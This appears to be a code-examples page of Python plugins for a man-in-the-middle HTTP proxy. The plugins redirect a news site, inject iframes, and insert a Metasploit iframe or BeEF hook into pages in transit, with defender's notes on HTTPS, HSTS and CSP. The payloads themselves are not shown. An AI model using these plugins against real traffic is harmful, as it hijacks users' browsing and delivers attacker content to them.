Пример #1
def doResponse(session, request_header, response_header, data):
    """Turn a 200 HTML response for one hard-coded host into a 307 redirect.

    Sample proxy response plugin.  When the request matches the ``Host``
    rule for ``target`` and the response matches the ``Content-type`` rule,
    the status line (read from ``response_header[0][1]``) is rewritten to
    ``307 Temporary Redirect`` and a ``Location`` header pointing at
    ``redirect_url`` is set: an existing one is replaced, otherwise one is
    appended.

    Returns ``(response_header, data, changed, stop)``.  ``changed`` and
    ``stop`` are 1 only when the redirect was written, otherwise 0.
    ``session`` is unused and ``data`` is passed through untouched;
    ``response_header`` is modified in place.

    ``header`` and ``ml.jjlog`` come from outside this snippet; how
    ``header.headertest`` compares names and values is not visible here.

    Defender's note: the rewrite depends on an on-path proxy that can read
    and alter the response.  Over HTTPS with certificate validation (and
    HSTS to prevent a downgrade to HTTP) the client would reject the
    tampered exchange; over cleartext HTTP the only trace is a redirect to
    an origin the real server never named.
    """
    changed = 0
    stop = 0

    target = "www.foxnews.com"
    redirect_url = "http://www.cnn.com"

    # Guard 1: the request must be for the configured site.
    if not header.headertest(request_header, (("Host", target),)):
        return(response_header, data, changed, stop)

    # Guard 2: only touch responses that carry a web page.
    if not header.headertest(response_header, (("Content-type", "TEXT/HTML"),)):
        return(response_header, data, changed, stop)

    # NOTE(review): split(" ") has no maxsplit, so a reason phrase that
    # contains a space (e.g. "Not Found") produces more than three fields and
    # this unpack raises ValueError before the 200 check below is reached.
    status_line = response_header[0][1]
    (protover, response_code, reason) = status_line.split(" ")

    print ("Response code line had these elements --%s-- --%s-- --%s\n" % (protover,response_code,reason) )

    # Anything other than a 200 is left alone.
    if response_code != "200":
        ml.jjlog.debug("Response code was %s, not 200, so we won't inject here\n" % response_code)
        return(response_header, data, changed, stop)

    # Swap the status for a temporary redirect.  The original listing also
    # carried a commented-out 301 "Moved Permanently" alternative.
    new_code = 307
    new_reason = "Temporary Redirect\n"
    header.headerfix(response_header, "Response", "%s %s %s" % (protover, new_code, new_reason))

    # Replace an existing Location header, otherwise add one at the end.
    # TODO: make a routine that inserts a new header after a specific line.
    location_value = redirect_url + "\n"
    if header.headerget(response_header, "Location") and redirect_url:
        header.headerfix(response_header, "Location", location_value)
        ml.jjlog.debug("Replaced the location: %s\n" % redirect_url)
    else:
        response_header.append(("Location", location_value))
        ml.jjlog.debug("Appended our own location: %s\n" % redirect_url)

    # The header is final: report the change and ask that no later plugin
    # touch this response.
    # TODO: Decide on how to do priority/dependencies/ordering so redirects go first.
    changed = 1
    stop = 1
    return(response_header, data, changed, stop)
Пример #2
def doResponse(session, request_header, response_header, data):
    """Insert a fixed iframe after ``<body>`` in 200 HTML responses for one host.

    Sample proxy response plugin.  When the request matches the ``Host``
    rule for ``target``, the response matches the ``Content-type`` rule and
    the status code is "200", every literal ``<body>`` in ``data`` is
    replaced by ``<body>`` followed by an iframe whose ``src`` is
    ``inserted_url``.  The ``Content-Length`` header is then reset to
    ``len(data)``.

    Returns ``(response_header, data, changed, stop)``; ``changed`` and
    ``stop`` are 1 only when the body was rewritten.  ``session`` is unused.

    ``header`` and ``ml.jjlog`` come from outside this snippet.

    Defender's note: body rewriting of this kind requires cleartext HTTP or
    a client that accepts the proxy's certificate.  Serving the site over
    HTTPS with HSTS removes the opportunity, and a Content-Security-Policy
    restricting frame sources limits what an injected iframe may load.
    """
    changed = 0
    stop = 0

    target = "slashdot.org"

    # TODO: Set the traffic capture code that gets my IP address to log it into
    #       some kind of global or class variable.
    inserted_url = "http://www.inguardians.com/tools/logo-themiddler-150px.jpg"
    iframe = '''<iframe height=103 width=150 src="%s"></iframe>''' % (inserted_url)

    # Guard 1: the request must be for the configured site.
    if not header.headertest(request_header, (("Host", target),)):
        return(response_header, data, changed, stop)

    # Guard 2: only touch responses that carry a web page.
    if not header.headertest(response_header, (("Content-type", "TEXT/HTML"),)):
        return(response_header, data, changed, stop)

    # maxsplit=2 keeps a multi-word reason phrase in one piece.
    status_line = response_header[0][1]
    (protover, response_code, reason) = status_line.split(" ", 2)

    ml.jjlog.debug("Response code line had these elements --%s-- --%s-- --%s\n" % (protover,response_code,reason) )

    # A redirect or error carries no page worth editing.
    if response_code != "200":
        return(response_header, data, changed, stop)

    ml.jjlog.debug("Preparing to inject iframe into request for %s" % target)

    # Rewrite the body: every literal "<body>" gains the iframe right after it.
    data = re.sub(r'\<body\>', r'<body>' + iframe, data)

    # The body grew, so the advertised length must follow.
    # NOTE(review): len(data) equals the byte count only if data is a byte
    # string -- confirm what the proxy passes in.
    header.headerfix(response_header, "Content-Length", str(len(data)))

    # Report the change and ask that no later plugin touch this response.
    # TODO: Decide on how to do priority/dependencies/ordering so redirects go first.
    changed = 1
    stop = 1
    return(response_header, data, changed, stop)
Пример #3
def doResponse(session, request_header, response_header, data):
    """Replace the response body with ``redirect_code`` when both header rules match.

    Sample proxy response plugin.  ``request_match``, ``response_match``,
    ``redirect_code``, ``redirect_url`` and ``header`` are module-level
    names defined outside this snippet; ``redirect_code`` is presumably a
    page that sends the browser to ``redirect_url`` -- confirm against its
    definition.

    Returns ``(response_header, data, changed, stop)``.  ``session`` is
    unused.

    Defender's note: replacing a body in flight requires cleartext HTTP or
    a client that trusts the proxy's certificate; HTTPS with HSTS closes
    that path.
    """
    changed = 0
    stop = 0

    # Both tests always run: the original combines them with "&", which does
    # not short-circuit.
    request_hit = header.headertest(request_header, request_match)
    response_hit = header.headertest(response_header, response_match)

    if request_hit & response_hit:
        # Discard the server's body entirely.
        data = redirect_code
        print("User has been redirected to " + redirect_url)

    # NOTE(review): nothing in this function sets changed to 1, so this
    # branch never runs and the caller is always told the response is
    # unmodified, even when data was replaced above.
    if changed:
        header.headerfix(response_header, "Content-Length", str(len(data)))

    return(response_header, data, changed, stop)
Пример #4
def doResponse(session, request_header, response_header, data):
    """Insert ``code1`` before every ``</body>`` when both header rules match.

    Sample proxy response plugin.  ``request_match``, ``response_match``,
    ``code1`` and ``header`` are module-level names defined outside this
    snippet.  Judging by the log message, ``code1`` is an iframe that
    points at a Metasploit-served page -- confirm against its definition.

    On a match the body is rewritten, ``Content-Length`` is reset to
    ``len(data)`` and ``changed`` is returned as 1; ``stop`` stays 0, so
    later plugins may still run.  Returns
    ``(response_header, data, changed, stop)``.  ``session`` is unused.

    Defender's note: this relies on the proxy seeing the page in the
    clear.  HTTPS with HSTS prevents the rewrite, and a
    Content-Security-Policy restricting frame sources limits what injected
    markup can load.
    """
    changed = 0
    stop = 0

    # Both tests always run: "&" does not short-circuit.
    request_hit = header.headertest(request_header, request_match)
    response_hit = header.headertest(response_header, response_match)

    if not (request_hit & response_hit):
        return(response_header, data, changed, stop)

    # re.sub with the default count rewrites every "</body>" it finds.
    data = re.sub('</body>', code1 + '</body>', data)
    changed = 1
    print("Metasploit iframe injected")

    # Keep the advertised length in step with the longer body.
    # NOTE(review): len(data) equals the byte count only if data is a byte
    # string -- confirm what the proxy passes in.
    header.headerfix(response_header, "Content-Length", str(len(data)))

    return(response_header, data, changed, stop)
Пример #5
def doResponse(session, request_header, response_header, data):
    """Insert ``code1`` before every ``</body>`` when both header rules match.

    Sample proxy response plugin.  ``request_match``, ``response_match``,
    ``code1`` and ``header`` are module-level names defined outside this
    snippet.  Judging by the log message, ``code1`` is a script tag that
    loads a BeEF hook -- confirm against its definition.

    Returns ``(response_header, data, changed, stop)``.  ``changed`` is 1
    when the body was rewritten; ``stop`` is always 0.  ``session`` is
    unused.

    Defender's note: the rewrite needs the page to cross the proxy in the
    clear.  HTTPS with HSTS prevents it, and a Content-Security-Policy that
    restricts script sources stops the browser from loading a script from
    an origin the site did not allow.
    """
    stop = 0

    # Evaluate both rules up front; the original joins them with the
    # non-short-circuiting "&" operator.
    matched = (header.headertest(request_header, request_match)
               & header.headertest(response_header, response_match))

    changed = 0
    if matched:
        # Every "</body>" gets the extra markup placed in front of it.
        data = re.sub('</body>', code1 + '</body>', data)
        changed = 1
        print("BeEF hook injected")

    if changed:
        # The body is longer now; advertise the new length.
        # NOTE(review): assumes len(data) is a byte count -- confirm the
        # type of data supplied by the proxy.
        header.headerfix(response_header, "Content-Length", str(len(data)))

    return(response_header, data, changed, stop)
Пример #6
def doRequest(session, request_header, data):
    """Disabled request plugin that would overwrite the ``Host`` header.

    The rewrite branch is switched off with a constant 0, so this function
    currently returns ``(request_header, data, 0, 0)`` unchanged and
    ``header.headertest`` is never called.  ``request_match``,
    ``redirect_url`` and ``header`` are module-level names defined outside
    this snippet.  ``session`` is unused.

    Known bug, per the original author: the routine changes only the Host
    header and not the socket's destination, and it writes a full URL where
    a bare hostname belongs.  Host was added in HTTP/1.1 to tell the server
    which virtual host the browser wants.
    """
    changed = 0
    stop = 0

    # Constant off-switch: "and" short-circuits on it, so the header test is
    # never evaluated while this stays 0.
    rewrite_enabled = 0

    if rewrite_enabled and header.headertest(request_header, request_match):
        changed = 1
        stop = 1
        new_host = redirect_url + '\r\n'
        header.headerfix(request_header, "Host", new_host)
        print("User request URL has been rewritten to " + redirect_url)

    return (request_header, data, changed, stop)